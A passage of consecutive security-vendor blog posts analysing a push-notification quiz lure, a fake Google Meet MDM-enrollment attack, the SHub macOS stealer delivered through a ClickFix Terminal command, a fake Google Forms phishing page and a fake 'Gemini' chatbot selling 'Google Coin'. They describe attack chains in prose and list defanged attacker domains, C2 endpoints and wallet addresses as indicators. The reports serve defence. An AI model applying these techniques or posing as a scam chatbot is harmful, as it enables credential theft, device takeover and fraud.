But another clue, also mentioned by the Malware Removal Support team—a domain called triviabox[.]co[.]in—practically brought us straight to the source.

We found a site that challenged our intelligence by prompting us to take a quiz.

Screenshot showing "Only people who lived through the 80s can score 15/20 on this quiz"
Quiz website example

Later we found these quizzes come in different flavors. Some about geography, vocabulary, and history, while others are specifically targeted at Canada, Germany, France, Japan, and the US.

But the main goal of these sites is to get you to click the “Start the quiz” button, so the site can send notifications later and make money from ads, affiliate schemes, scams, or unwanted downloads.

Screenshot showing "Ready to test your knowledge? Start the quiz"
Ready to test your knowledge? Start the quiz

What that button does before it starts the quiz is show the visitor a prompt with a misleading background.

Screenshot showing "Click Allow to continue" and a show notifications prompt.
Click Allow to continue triggers the browser’s “show notifications” prompt

The show notifications text in the actual prompt tells the real story. You’ll be giving the website permission to show you notifications even when you’re not on the website, which makes it hard for users to determine the origin.

The Click “Allow” to continue text with the red arrow on the website itself is nothing more than a well-placed lure to get you to click that Allow button and open the flood gates. To avoid raising suspicion, the visitor is then presented with the quiz, so later on they will have no reason to suspect what started the ordeal.

Web push notifications (also called browser push notifications) are not always simple advertisements. Some can be misleading messages about the safety of your computer. The gear icon in the notifications themselves can be very helpful. On Chromium-based browsers, clicking it will lead you to the Notifications settings menu where you can block them.

Unfortunately, we often find them used by “affiliates” to promote security software. If you’re looking for an anti-malware solution that doesn’t make use of such affiliates, you know where to find us.

How to remove and block web push notifications

For every browser, the notifications look slightly different and the methods to disable them are slightly different as well. To make them easier to find, I have split them up by browser.

Chrome

To completely turn off notifications, even from an extension:

  • Click the three dots button in the upper right-hand corner of the Chrome menu to enter the Settings menu.
  • In the Settings menu and click on Privacy and Security.
  • Click on Site settings.
  • In that menu, select Notifications.
  • By default, the slider is set to Sites can ask to send notifications, but feel free to move it to Don’t allow sites to send notifications if you wish to block notifications completely.

For more granular control, you can use the Customized behaviors menu to manipulate the individual items.

Customized behaviors section of the Chromium notifications menu
Customized behaviors section of the Chromium notifications menu

Note that sometimes you may see items with a jigsaw puzzle piece icon in the place of the three stacked dots. These are enforced by an extension, so you would have to figure out which extension is responsible first and then remove it. But for the ones with the three dots behind them, you can click on the dots to open this context menu:

Selecting Block will move the item to the block list. Selecting Remove will delete the item from the list. It will ask permission to show notifications again if you visit their site (unless you have set the slider to Block).

Shortcut: another way to get into the Notifications menu shown earlier is to click on the gear icon in the notifications themselves. This will take you directly to the itemized list.

Firefox

To completely turn off notifications in Firefox:

  • Click the three horizontal bars in the upper right-hand corner of the menu bar and select Options in the settings menu.
  • On the left-hand side, select Privacy & Security.
  • Scroll down to the Permissions section and click on Notifications.

  • In the resulting menu, put a checkmark in the Block new requests asking to allow notifications box at the bottom.

In the same menu, you can apply a more granular control by setting listed items to Block or Allow by using the drop-down menu behind each item.

Click on Save Changes when you’re done.

Opera

Where push notifications are concerned, you can see how closely related Opera and Chrome are.

  • Open the menu by clicking the O in the upper left-hand corner.
  • Click on Settings (on Windows)/Preferences (on Mac).
  • Click on Advanced and select Privacy & security.
  • Under Content settings (desktop)/Site settings (Android,) select Notifications.
Opera notifications menu

On Android, you can remove all the items at once or one by one. On desktops, it works exactly the same as it does in Chrome. The same is true for accessing the menu from the notifications themselves. Click the gear icon in the notification, and you will be taken to the Notifications menu.

Edge

In Edge, go to Settings and more in the upper right corner of your browser window, then

  • Select Settings  > Privacy, search, and services > Site permissions > All sites.
  • Select the website for which you want to block notifications, find the Notifications setting, and choose Block from the dropdown menu.​​​​​​​

To manage notifications from your browser address bar: 

To check or manage notifications while visiting a website you’ve already subscribed to, follow the steps below:   

  • Select View site information to the left of your address bar.
  • Under Permissions for this site Notifications, choose Block from the drop-down menu.

Safari on Mac

On your Mac, open the Apple menu, then

  • Choose System Settings, then click Notifications in the sidebar. (You may need to scroll down.)
  • Go to Application Notifications, click the website, then turn off Allow Notifications.

The website remains in the list in Notifications settings. To remove it from the list, deny the website permission to send notifications in Safari settings. See Change websites settings.

To stop seeing requests for permission to send you notifications in Safari:

  • Go to the Safari app on your Mac.
  • Choose Safari > Settings.
  • Click Websites, then click Notifications.
  • Deselect Allow websites to ask for permission to send notifications.

From now on, when you visit a website that wants to send you notifications, you aren’t asked.

Are these notifications useful at all?

While we could conceive of some cases where push notifications might be found useful, we would certainly not hold it against you if you decided to disable them altogether.

Web push notifications are not just there to disturb Windows users. Android, Chromebook, MacOS, even Linux users may see them if they use one of the participating browsers: Chrome, Firefox, Opera, Edge, and Safari. In some cases, the browser does not even have to be opened, and it can still display push notifications.

Be careful out there and think twice before you click “Allow.”

Indicators of Compromise (IOCs)

During the course of the investigation we found—and blocked—these domains related to the campaign:

  1. dailyrumour[.]co.nz
  2. edifaqe[.]org
  3. geniusfun[.]co.in
  4. geniusfun[.]co.za
  5. genisfun[.]co.nz 
  6. holicithed[.]com
  7. ivenih[.]org
  8. loopdeviceconnection[.]co.in
  9. mindorbittest[.]com
  10. navixzuno[.]co.in
  11. quizcentral[.]co.in
  12. quizcentral[.]co.za
  13. rixifabed[.]org
  14. triviabox[.]co.in
  15. uhuhedeb[.]org
  16. unsphiperidion[.]co.in
  17. yeqeso[.]org
  18. ylloer[.]org

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

One click on this fake Google Meet update can give attackers control of your PC

6 March 2026 at 20:35

A phishing page disguised as a Google Meet update notice is silently handing victims’ Windows computers to an attacker-controlled management server. No password is stolen, no files are downloaded, and there are no obvious red flags.

It just takes a single click on a convincing Google Meet fake update prompt to enroll your Windows PC into an attacker-controlled device management system.

“To keep using Meet, install the latest version”

The social engineering is almost embarrassingly simple: an app update notice in the right brand colors.

The page impersonates Google Meet well enough to pass a casual glance. But neither the Update now button nor the Learn more link below it goes anywhere near Google.

Update to the latest version - a fake update notice for Google Meet that enrolls the user in an attackers device management system.

Both trigger a Windows deep link using the ms-device-enrollment: URI scheme. That’s a handler built into Windows so IT administrators can send staff a one-click device enrollment link. The attacker has simply pointed it at their own server instead.

What “enrollment” actually means for your machine

The moment a visitor clicks, Windows bypasses the browser and opens its native Set up a work or school account dialog. That’s the same prompt that appears when a corporate IT team provisions a new laptop.

The URI arrives pre-populated: The username field reads collinsmckleen@sunlife-finance.com (a domain impersonating Sun Life Financial), and the server field already points to the attacker’s endpoint at tnrmuv-api.esper[.]cloud.

The attacker isn’t trying to perfectly impersonate the victim’s identity. The goal is simply to get the user to click through a trusted Windows enrollment workflow, which grants device control regardless of whose name appears in the form. Campaigns like this rarely expect everyone to fall for them. Even if most people stop, a small percentage continuing is enough for the attack to succeed.

A victim who clicks Next and proceeds through the wizard will hand their machine to an MDM (mobile device management) server they have never heard of.

MDM (Mobile Device Management) is the technology companies use to remotely administer employee devices. Once a machine is enrolled, the MDM administrator can silently install or remove software, enforce or change system settings, read the file system, lock the screen, and wipe the device entirely, all without the user’s knowledge.

There is no ongoing malware process to detect, because the operating system itself is doing the work on the attacker’s behalf.

The attacker’s server is hosted on Esper, a legitimate commercial MDM platform used by real enterprises.

Decoding the Base64 string embedded in the server URL reveals two pre-configured Esper objects: a blueprint ID (7efe89a9-cfd8-42c6-a4dc-a63b5d20f813) and a group ID (4c0bb405-62d7-47ce-9426-3c5042c62500). These represent the management profile that will be applied to any enrolled device.

The ms-device-enrollment: handler works exactly as Microsoft designed it, and Esper works exactly as Esper designed it. The attacker has simply pointed both at someone who never consented.

No malware, no credential theft. That’s the problem.

There is no malicious executable here, and no phished Microsoft login.

The ms-device-enrollment: handler is a documented, legitimate Windows feature that the attacker has simply redirected.

Because the enrollment dialog is a real Windows system prompt rather than a spoofed web page, it bypasses browser security warnings and email scanners looking for credential-harvesting pages.

The command infrastructure runs on a reputable SaaS platform, so domain-reputation blocking is unlikely to help.

Most conventional security tools have no category for “legitimate OS feature pointed at hostile infrastructure.”

The broader trend here is one the security industry has been watching with growing concern: attackers abandoning malware payloads in favor of abusing legitimate operating system features and cloud platforms.

What to do if you think you’ve been affected

Because the attack relies on legitimate system features rather than malware, the most important step is checking whether your device was enrolled.

  • Check whether your device was enrolled:
    • Open Settings > Accounts > Access work or school.
    • If you see an entry you don’t recognize, especially one referencing sunlife-finance[.]com or esper[.]cloud, click it and select Disconnect.
  • If you clicked “Update now” on updatemeetmicro[.]online and completed the enrollment wizard, treat your device as potentially compromised.
  • Run an up-to-date, real-time anti-malware solution to check for any secondary payloads the MDM server may have pushed after enrollment.
  • If you are an IT administrator, consider whether your organization needs a policy blocking unapproved MDM enrollment. Microsoft Intune and similar tools can restrict which MDM servers Windows devices are allowed to join.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets

6 March 2026 at 09:44

A convincing fake version of the popular Mac utility CleanMyMac is tricking users into installing malware.

The site instructs visitors to paste a command into Terminal. If they do, it installs SHub Stealer, macOS malware designed to steal sensitive data including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and Telegram sessions. It can even modify wallet apps such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live so attackers can later steal the wallet’s recovery phrase.

The site impersonates the CleanMyMac website, but is unconnected to the legitimate software or the developers, MacPaw.

Remember: Legitimate apps almost never require you to paste commands into Terminal to install them. If a website tells you to do this, treat it as a major red flag and do not proceed. When in doubt, download software only from the developer’s official website or the App Store.

Read the deep-dive to see what we discovered.

A fake website impersonating CleanMyMac, which goes on to install SHub Stealer

“Open Terminal and paste the following command”

The attack begins at cleanmymacos[.]org, a website designed to look like the real CleanMyMac product page. Visitors are shown what appears to be an advanced installation option of the kind a power user might expect. The page instructs them to open Terminal, paste a command, and press Return. There’s no download prompt, disk image, or security dialog.

That command performs three actions in quick succession:

  • First, it prints a reassuring line: macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app to make the Terminal output look legitimate.
  • Next, it decodes a base64-encoded link that hides the real destination.
  • Finally, it downloads a shell script from the attacker’s server and pipes it directly into zsh for immediate execution.

From the user’s perspective, nothing unusual happens.

This technique, known as ClickFix, has become a common delivery method for Mac infostealers. Instead of exploiting a vulnerability, it tricks the user into running the malware themselves. Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.

The fake CleanMyMac website instructs the user to open Terminal and paste a command.

Geofencing: Not everyone gets the payload

The first script that arrives on the victim’s Mac is a loader, which is a small program that checks the system before continuing the attack.

One of its first checks looks at the macOS keyboard settings to see whether a Russian-language keyboard is installed. If it finds one, the malware sends a cis_blocked event to the attacker’s server and exits without doing anything else.

This is a form of geofencing. Malware linked to Russian-speaking cybercriminal groups often avoids infecting machines that appear to belong to users in CIS countries (the Commonwealth of Independent States, which includes Russia and several neighboring nations). By avoiding systems that appear to belong to Russian users, the attackers reduce the risk of attracting attention from local law enforcement.

The behavior does not prove where SHub was developed, but it follows a pattern long observed in that ecosystem, where malware is configured not to infect systems in the operators’ own region.

Detect CIS and block with telemetry

If the system passes this check, the loader sends a profile of the machine to the command-and-control server at res2erch-sl0ut[.]com. The report includes the device’s external IP address, hostname, macOS version, and keyboard locale.

Each report is tagged with a unique build hash, a 32-character identifier that acts as a tracking ID. The same identifier appears in later communications with the server, allowing the operators to link activity to a specific victim or campaign.

“System Preferences needs your password to continue”

Comparing payloads served with and without a build hash reveals another campaign-level field in the malware builder: BUILD_NAME. In the sample tied to a build hash, the value is set to PAds; in the version without a hash, the field is empty. The value is embedded in the malware’s heartbeat script and sent to the command-and-control (C2) server during every beacon check-in alongside the bot ID and build ID.

What PAds stands for cannot be confirmed from the payload alone, but its structure matches the kind of traffic-source tag commonly used in pay-per-install or advertising campaigns to track where infections originate. If that interpretation is correct, it suggests victims may be reaching the fake CleanMyMac site through paid placements rather than organic search or direct links.

Once the loader confirms a viable target, it downloads and executes the main payload: an AppleScript hosted at res2erch-sl0ut[.]com/debug/payload.applescript. AppleScript is Apple’s built-in automation language, which allows the malware to interact with macOS using legitimate system features. Its first action is to close the Terminal window that launched it, removing the most obvious sign that anything happened.

Next comes the password harvest. The script displays a dialog box that closely mimics a legitimate macOS system prompt. The title reads “System Preferences”, the window shows Apple’s padlock icon, and the message says:

The awkward wording—“for continue” instead of “to continue”—is one clue the prompt is fake, though many users under pressure might not notice it.

“Required Application Helper. Please enter password for continue.”

If the user enters their password, the malware immediately checks whether it is correct using the macOS command-line tool dscl. If the password is wrong, it is logged and the prompt appears again. The script will repeat the prompt up to ten times until a valid password is entered or the attempts run out.

That password is valuable because it unlocks the macOS Keychain, Apple’s encrypted storage system for saved passwords, Wi-Fi credentials, app tokens, and private keys. Without the login password, the Keychain database is just encrypted data. With it, the contents can be decrypted and read.

A systematic sweep of everything worth stealing

With the password in hand, SHub begins a systematic sweep of the machine. All collected data is staged in a randomly named temporary folder—something like /tmp/shub_4823917/—before being packaged and sent to the attackers.

The browser targeting is extensive. SHub searches 14 Chromium-based browsers (Chrome, Brave, Edge, Opera, OperaGX, Vivaldi, Arc, Sidekick, Orion, Coccoc, Chrome Canary, Chrome Dev, Chrome Beta, and Chromium), stealing saved passwords, cookies, and autofill data from every profile it finds. Firefox receives the same treatment for stored credentials.

The malware also scans installed browser extensions, looking for 102 known cryptocurrency wallet extensions by their internal identifiers. These include MetaMask, Phantom, Coinbase Wallet, Exodus Web3, Trust Wallet, Keplr, and many others.

Desktop wallet applications are also targeted. SHub collects local storage data from 23 wallet apps, including Exodus, Electrum, Atomic Wallet, Guarda, Coinomi, Sparrow, Wasabi, Bitcoin Core, Monero, Litecoin Core, Dogecoin Core, BlueWallet, Ledger Live, Ledger Wallet, Trezor Suite, Binance, and TON Keeper. Each wallet folder is capped at 100 MB to keep the archive manageable.

Beyond wallets and browsers, SHub also captures the macOS Keychain directory, iCloud account data, Safari cookies and browsing data, Apple Notes databases, and Telegram session files—information that could allow attackers to hijack accounts without knowing the passwords.

It also copies shell history files (.zsh_history and .bash_history) and .gitconfig, which often contain API keys or authentication tokens used by developers.

All of this data is compressed into a ZIP archive and uploaded to res2erch-sl0ut[.]com/gate along with a hardcoded API key identifying the malware build. The archive and temporary files are then deleted, leaving minimal traces on the system.

Screenshot of main debug execution

The part that keeps stealing after you’ve cleaned up

Most infostealers are smash-and-grab operations: they run once, take everything, and leave. SHub does that, but it also goes a step further.

If it finds certain wallet applications installed, it downloads a replacement for the application’s core logic file from the attacker’s server and swaps it in silently. We retrieved and analyzed five such replacements. All five were backdoored, each tailored to the architecture of the target application.

The targets are Electron-based apps. These are desktop applications built on web technologies whose core logic lives in a file called app.asar. SHub kills the running application, downloads a replacement app.asar from the C2 server, overwrites the original inside the application bundle, strips the code signature, and re-signs the app so macOS will accept it. The process runs silently in the background.

The five confirmed crypto wallet apps are Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite.

Exodus: silent credential theft on every unlock

On every wallet unlock, the modified app silently sends the user’s password and seed phrase to wallets-gate[.]io/api/injection. A one-line bypass is added to the network filter to allow the request through Exodus’s own domain allowlist.

Atomic Wallet: the same exfiltration, no bypass required

On every unlock, the modified app sends the user’s password and mnemonic to wallets-gate[.]io/api/injection. No network filter bypass is required—Atomic Wallet’s Content Security Policy already allows outbound HTTPS connections to any domain.

Ledger Wallet: TLS bypass and a fake recovery wizard

The modified app disables TLS certificate validation at startup. Five seconds after launch, it replaces the interface with a fake three-page recovery wizard that asks the user for their seed phrase and sends it to wallets-gate[.]io/api/injection.

Ledger Live: identical modifications

Ledger Live receives the same modifications as Ledger Wallet: TLS validation is disabled and the user is presented with the same fake recovery wizard.

Trezor Suite: fake security update overlay

After the application loads, a full-screen overlay styled to match Trezor Suite’s interface appears, presenting a fake critical security update that asks for the user’s seed phrase. The phrase is validated using the app’s own bundled BIP39 library before being sent to wallets-gate[.]io/api/injection.

At the same time, the app’s update mechanism is disabled through Redux store interception so the modified version remains in place.

Five wallets, one endpoint, one operator

Across all five modified applications, the exfiltration infrastructure is identical: the same wallets-gate[.]io/api/injection endpoint, the same API key, and the same build ID.

Each request includes a field identifying the source wallet—exodus, atomic, ledger, ledger_live, or trezor_suite—allowing the backend to route incoming credentials by product.

This consistency across five independently modified applications strongly suggests that a single operator built all of the backdoors against the same backend infrastructure.

Screenshot showing stealer code.

A persistent backdoor disguised as Google’s own update service

To maintain long-term access, SHub installs a LaunchAgent, which is a background task that macOS automatically runs every time the user logs in. The file is placed at:

~/Library/LaunchAgents/com.google.keystone.agent.plist

The location and name are chosen to mimic Google’s legitimate Keystone updater. The task runs every sixty seconds.

Each time it runs, it launches a hidden bash script located at:

~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate

The script collects a unique hardware identifier from the Mac (the IOPlatformUUID) and sends it to the attacker’s server as a bot ID. The server can respond with base64-encoded commands, which the script decodes, executes, and then deletes.

In practice, this gives the attackers the ability to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed.

The final step is a decoy error message shown to the user:

“Your Mac does not support this application. Try reinstalling or downloading the version for your system.”

This explains why CleanMyMac appeared not to install and sends the victim off to troubleshoot a problem that doesn’t actually exist.

SHub’s place in a growing family of Mac stealers

SHub is not an isolated creation. It belongs to a rapidly evolving family of AppleScript-based macOS infostealers including campaigns such as MacSync Stealer (an expanded version of malware known as Mac.c, first seen in April 2025) and Odyssey Stealer, and shares traits with other credential-stealing malware such as Atomic Stealer.

These families share a similar architecture: a ClickFix delivery chain, an AppleScript payload, a fake System Preferences password prompt, recursive data harvesting functions, and exfiltration through a ZIP archive uploaded to a command-and-control server.

What distinguishes SHub is the sophistication of its infrastructure. Features such as per-victim build hashes for campaign tracking, detailed wallet targeting, wallet application backdooring, and a heartbeat system capable of running remote commands all suggest an author who studied earlier variants and invested heavily in expanding them. The result resembles a malware-as-a-service platform rather than a simple infostealer.

The presence of a DEBUG tag in the malware’s internal identifier, along with the detailed telemetry it sends during execution, suggests the builder was still under active development at the time of analysis.

The campaign also fits a broader pattern of brand impersonation attacks. Researchers have documented similar ClickFix campaigns impersonating GitHub repositories, Google Meet, messaging platforms, and other software tools, with each designed to convince users that they are following legitimate installation instructions. The cleanmymacos.org site appears to follow the same playbook, using a well-known Mac utility as the lure.

What to do if you may have been affected

The most effective part of this attack is also its simplest: it convinces the victim to run the malicious command themselves.

By presenting a Terminal command as a legitimate installation step, the campaign sidesteps many of macOS’s built-in protections. No app download is required, no disk image is opened, and no obvious security warning appears. The user simply pastes the command and presses Return.

This reflects a broader trend: macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional. SHub Stealer, even in its current state, represents a step beyond many earlier macOS infostealers.

For most users, the safest rule is also the simplest: install software only from the App Store or from a developer’s official website. The App Store handles installation automatically, so there is no Terminal command, no guesswork, and no moment where you have to decide whether to trust a random website.

  • Do not run the command. If you have not yet executed the Terminal command shown on cleanmymacos[.]org or a similar site, close the page and do not return.
  • Check for the persistence agent. Open Finder, press Cmd + Shift + G, and navigate to ~/Library/LaunchAgents/.
    If you see a file named com.google.keystone.agent.plist that you did not install, delete it. Also check: ~/Library/Application Support/Google/. If a folder named GoogleUpdate.app is present and you did not install it, remove it.
  • Treat your wallet seed phrase as compromised. If you have Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, or Trezor Suite installed and you ran this command, assume your seed phrase and wallet password have been exposed. Move your funds to a new wallet created on a clean device immediately. Seed phrases cannot be changed, and anyone with a copy can access the wallet.
  • Change your passwords. Your macOS login password and any passwords stored in your browser or Keychain should be considered exposed. Change them from a device you trust.
  • Revoke sensitive tokens. If your shell history contained API keys, SSH keys, or developer tokens, revoke and regenerate them.
  • Run Malwarebytes for Mac. It can detect and remove remaining components of the infection, including the LaunchAgent and modified files.

Indicators of compromise (IOCs)

Domains

  • cleanmymacos[.]org — phishing site impersonating CleanMyMac
  • res2erch-sl0ut[.]com — primary command-and-control server (loader delivery, telemetry, data exfiltration)
  • wallets-gate[.]io — secondary C2 used by wallet backdoors to exfiltrate seed phrases and passwords

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Job scam uses fake Google Forms site to harvest Google logins

18 February 2026 at 13:22

As part of our investigation into a job-themed phishing campaign, we came across several suspicious URLs that all looked like this:

https://forms.google.ss-o[.]com/forms/d/e/{unique_id}/viewform?form=opportunitysec&promo=

The subdomain forms.google.ss-o[.]com is a clear attempt to impersonate the legitimate forms.google.com. The “ss-o” is likely introduced to look like “single sign-on,” an authentication method that allows users to securely log in to multiple, independent applications or websites using one single set of credentials (username and password).

Unfortunately, when we tried to visit the URLs we were redirected to the local Google search website. This is a common phisher’s tactic to prevent victims from sharing their personalized links with researchers or online analysis.

After some digging, we found a file called generation_form.php on the same domain, which we believe the phishing crew used to create these links. The landing page for the campaign was: https://forms.google.ss-o[.]com/generation_form.php?form=opportunitysec

The generation_form.php script does what the name implies: It creates a personalized URL for the person clicking that link.

With that knowledge in hand, we could check what the phish was all about. Our personalized link brought us to this website:

Fake Google Forms site
Fake Google Forms site

The greyed out “form” behind the prompt promises:

  • We’re Hiring! Customer Support Executive (International Process)
  • Are you looking to kick-start or advance your career…
  • The fields in the form: Full Name, Email address, and an essay field “Please describe in detail why we should choose you”
  • Buttons: “Submit” and “Clear form.”

The whole web page emulates Google Forms, including logo images, color schemes, a notice about not “submitting passwords,” and legal links. At the bottom, it even includes the typical Google Forms disclaimer (“This content is neither created nor endorsed by Google.”) for authenticity.

Clicking the “Sign in” button took us to https://id-v4[.]com/generation.php, which has now been taken down. The domain id-v4.com has been used in several phishing campaigns for almost a year. In this case, it asked for Google account credentials.

Given the “job opportunity” angle, we suspect links were distributed through targeted emails or LinkedIn messages.

How to stay safe

Lures that promise remote job opportunities are very common these days. Here are a few pointers to help keep you safe from targeted attacks like this:

  • Do not click on links in unsolicited job offers.
  • Use a password manager, which would not have filled in your Google username and password on a fake website.
  • Use an up to date, real-time anti-malware solution with a web protection component.

Pro tip: Malwarebytes Scam Guard identified this attack as a scam just by looking at the URL.

IOCs

id-v4[.]com

forms.google.ss-o[.]com

forms.google.ss-o.com blocked by Malwarebytes
Blocked by Malwarebytes

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Scammers use fake “Gemini” AI chatbot to sell fake “Google Coin”

18 February 2026 at 11:10

Scammers have found a new use for AI: creating custom chatbots posing as real AI assistants to pressure victims into buying worthless cryptocurrencies.

We recently came across a live “Google Coin” presale site featuring a chatbot that claimed to be Google’s Gemini AI assistant. The bot guided visitors through a polished sales pitch, answered their questions about investment, projecting returns, and ultimately ended with victims sending an irreversible crypto payment to the scammers.

Google does not have a cryptocurrency. But as “Google Coin” has appeared before in scams, anyone checking it out might think it’s real. And the chatbot was very convincing.

Google Coin Pre-Market

AI as the closer

The chatbot introduced itself as,

“Gemini — your AI assistant for the Google Coin platform.”

It used Gemini-style branding, including the sparkle icon and a green “Online” status indicator, creating the immediate impression that it was an official Google product.

When asked, “Will I get rich if I buy 100 coins?”, the bot responded with specific financial projections. A $395 investment at the current presale price would be worth $2,755 at listing, it claimed, representing “approximately 7x” growth. It cited a presale price of $3.95 per token, an expected listing price of $27.55, and invited further questions about “how to participate.”

This is the kind of personalized, responsive engagement that used to require a human scammer on the other end of a Telegram chat. Now the AI does it automatically.

Fake Gemini chatbot

A persona that never breaks

What stood out during our analysis was how tightly controlled the bot’s persona was. We found that it:

  • Claimed consistently to be “the official helper for the Google Coin platform”
  • Refused to provide any verifiable company details, such as a registered entity, regulator, license number, audit firm, or official email address
  • Dismissed concerns and redirected them to vague claims about “transparency” and “security”
  • Refused to acknowledge any scenario in which the project could be a scam
  • Redirected tougher questions to an unnamed “manager” (likely a human closer waiting in the wings)

When pressed, the bot doesn’t get confused or break character. It loops back to the same scripted claims: a “detailed 2026 roadmap,” “military-grade encryption,” “AI integration,” and a “growing community of investors.”

Whoever built this chatbot locked it into a sales script designed to build trust, overcome doubt, and move visitors toward one outcome: sending cryptocurrency.

Scripted fake Gemini chatbot

Why AI chatbots change the scam model

Scammers have always relied on social engineering. Build trust. Create urgency. Overcome skepticism. Close the deal.

Traditionally, that required human operators, which limited how many victims could be engaged at once. AI chatbots remove that bottleneck entirely.

A single scam operation can now deploy a chatbot that:

  • Engages hundreds of visitors simultaneously, 24 hours a day
  • Delivers consistent, polished messaging that sounds authoritative
  • Impersonates a trusted brand’s AI assistant (in this case, Google’s Gemini)
  • Responds to individual questions with tailored financial projections
  • Escalates to human operators only when necessary

This matches a broader trend identified by researchers. According to Chainalysis, roughly 60% of all funds flowing into crypto scam wallets were tied to scammers using AI tools. AI-powered scam infrastructure is becoming the norm, not the exception. The chatbot is just one piece of a broader AI-assisted fraud toolkit—but it may be the most effective piece, because it creates the illusion of a real, interactive relationship between the victim and the “brand.”

The bait: a polished fake

The chatbot sits on top of a convincing scam operation. The Google Coin website mimics Google’s visual identity with a clean, professional design, complete with the “G” logo, navigation menus, and a presale dashboard. It claims to be in “Stage 5 of 5” with over 9.9 million tokens sold and a listing date of February 18—all manufactured urgency.

To borrow credibility, the site displays logos of major companies—OpenAI, Google, Binance, Squarespace, Coinbase, and SpaceX—under a “Trusted By Industry” banner. None of these companies have any connection to the project.

If a visitor clicks “Buy,” they’re taken to a wallet dashboard that looks like a legitimate crypto platform, showing balances for “Google” (on a fictional “Google-Chain”), Bitcoin, and Ethereum.

The purchase flow lets users buy any number of tokens they want and generates a corresponding Bitcoin payment request to a specific wallet address. The site also layers on a tiered bonus system that kicks in at 100 tokens and scales up to 100,000: buy more and the bonuses climb from 5% up to 30% at the top tier. It’s a classic upsell tactic designed to make you think it’s smarter to spend more.

Every payment is irreversible. There is no exchange listing, no token with real value, and no way to get your money back.

Waiting for payment

What to watch for

We’re entering an era where the first point of contact in a scam may not be a human at all. AI chatbots give scammers something they’ve never had before: a tireless, consistent, scalable front-end that can engage victims in what feels like a real conversation. When that chatbot is dressed up as a trusted brand’s official AI assistant, the effect is even more convincing.

According to the FTC’s Consumer Sentinel data, US consumers reported losing $5.7 billion to investment scams in 2024 (more than any other type of fraud, and up 24% on the previous year). Cryptocurrency remains the second-largest payment method scammers use to extract funds, because transactions are fast and irreversible. Now add AI that can pitch, persuade, and handle objections without a human operator—and you have a scalable fraud model.

AI chatbots on scam sites will become more common. Here’s how to spot them:

They impersonate known AI brands. A chatbot calling itself “Gemini,” “ChatGPT,” or “Copilot” on a third-party crypto site is almost certainly not what it claims to be. Anyone can name a chatbot anything.

They won’t answer due diligence questions. Ask what legal entity operates the platform, what financial regulator oversees it, or where the company is registered. Legitimate operations can answer those questions, scam bots try to avoid them (and if they do answer, verify it).

They project specific returns. No legitimate investment product promises a specific future price. A chatbot telling you that your $395 will become $2,755 is not giving you financial information—it’s running a script.

They create urgency. Pressure tactics like, “stage 5 ends soon,” “listing date approaching,” “limited presale” are designed to push you into making fast decisions.

How to protect yourself

Google does not have a cryptocurrency. It has not launched a presale. And its Gemini AI is not operating as a sales assistant on third-party crypto sites. If you encounter anything suggesting otherwise, close the tab.

  • Verify claim on the official website of the company being referenced.
  • Don’t rely on a chatbot’s branding. Anyone can name a bot anything.
  • Never send cryptocurrency based on projected returns.
  • Search the project name along with “scam” or “review” before sending any money.
  • Use web protection tools like Malwarebytes Browser Guard, which is free to use and blocks known and unknown scam sites.

If you’ve already sent funds, report it to your local law enforcement, the FTC at reportfraud.ftc.gov, and the FBI’s IC3 at ic3.gov.

IOCs

0xEc7a42609D5CC9aF7a3dBa66823C5f9E5764d6DA

98388xymWKS6EgYSC9baFuQkCpE8rYsnScV4L5Vu8jt

DHyDmJdr9hjDUH5kcNjeyfzonyeBt19g6G

TWqzJ9sF1w9aWwMevq4b15KkJgAFTfH5im

bc1qw0yfcp8pevzvwp2zrz4pu3vuygnwvl6mstlnh6

r9BHQMUdSgM8iFKXaGiZ3hhXz5SyLDxupY


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

❌